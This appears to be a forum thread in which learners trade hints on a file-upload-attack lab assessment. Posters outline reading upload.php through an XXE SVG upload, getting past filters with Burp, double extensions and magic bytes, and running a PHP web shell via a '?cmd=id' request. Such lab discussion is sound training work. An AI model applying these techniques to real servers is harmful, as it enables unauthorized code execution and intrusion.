File Upload Attacks - Skills Assessment

Actually, some other people did already hint about this… Actually, it is the most popular post of this thread!
I haven’t seen those posts before tackling this problem myself… I had to understand it on my own, but it’s OK, I learned a lot!

According to your copy-paste, you did not leave the correct magic bytes (some of which are “invisible characters” which makes it impossible to even copy-paste as is from your burpsuite repeater’s request window… so much less copy-paste in a post here!

Lessons learned and note my future self: even after solving the challenge, I went back and had to check my notes and see that reproducing steps are not that easy… but I gained some extra experience on that particular point!
So, thank you for asking @Slenderhack !

The only way to solve this challenge is to disclose the .php source code for upload route and be somewhat familiar with PHP and its folder structure.

It took me 1 day to complete the assessment which was a bit frustrating, I thought it was a bug, when I looked the browser still returned the same result repeatedly, at that time I only used burp suite, then it worked perfectly :rofl:, my conclusion is never just trust your browser to do pentesting especially like chrome, firefox etc, browsers must update to protect their users, utilize burp suite, zap, etc.

You have to first read the .php source code using the svg, then once you have the directory you can use tools such as github.com/artemixer/filepwner to upload the shell

I can track my uploaded file with the mentioned name structure but unable to run the commands.

Now I got the flag. Thanks all of you.

If anyone needs help, text me.

Hi, I saw you succeeded. Can I ask you for a hint please? I can upload a SVG file but all the time in a response I receive the b64 back containg what I sent, but not the php file to move forward. Where am I wrong, that the xxe is not triggered?

Hi Michal.

You need to avoid the front-end verification, not just be able to upload .SVG files. And for the payload, you can check on HackTricks.

`I finally found the flag! First of all, I’d like to give you just some clues, not the actual answer.

` Firstly, you have to take a break for 1 day. I was stuck and, because of that, I was hurrying up and being careless.

` Then, look up the “Limited File Uploads” section again and try those payloads. Then you can find the source code of .php. According to the file, you can reach the uploads folder after that. This is the easiest section - you can find the flag by using the filename that you uploaded ... , and then You can run commands.

1 Like

Hi Michal,

I am also stuck here for 2 days, now, my SVG gives me back the base64 of the payload I sent, how did you solve this? I crafted my SVG exactly as shown in the module, replacing the “index.php” with “contact/upload.php”, the SVG element is not being populated with the source code

hello did you solve it ?
i have the same issue

This took me hours to do and this is how I completed it:

  1. You can find there is an upload.php file when looking at the script.js and in the post request when uploading an image when providing feedback in contact.

  2. You can view the code of upload.php in base64 by using the xml svg vulnerability. When you decode the contents you can view where and how your images are saved. The filename of the file you upload is also changed when you look at the source code of upload.php.

  3. Then upload the php payload that you have used for the previous tasks and with the same double extension. Then visit the file path of your uploaded file and you’ll find the flag after some commands.

2 Likes

you saved me !!!, just with this “The filename of the file you upload is also changed”

Bro I been stuck on this for days thank you, I cant believe all that was stopping me was the MF date format YY not YYYY :man_facepalming:

You helped ! I appreciate it
I was stuck on the filename part (didn’t read the upload.php file well)
Hint : Read & analyze the “upload.php”

Hello, me too, I have the same problem. Have you solved it?

haha…same here…i click several time…and can not find POST request…

hi im able to discover de scripts and upload my shell but how to execute the comands , i put like this
94.237.60.159:56429/contact/user_feedback_submissions/250208_cobra.pht.jpg?cmd=id

For those still struggling with the upload.php returning base64 from uploading XXE svg file
make sure that

  1. Burp capture
  2. No magic bytes/MIME
  3. Make sure that the extension is .svg
  4. use content-type of svg

Another useful hint is that, you need to upload the REAL jpg image first then use burp to modify

If upload the shell.phar.jpg directly it mostly will fail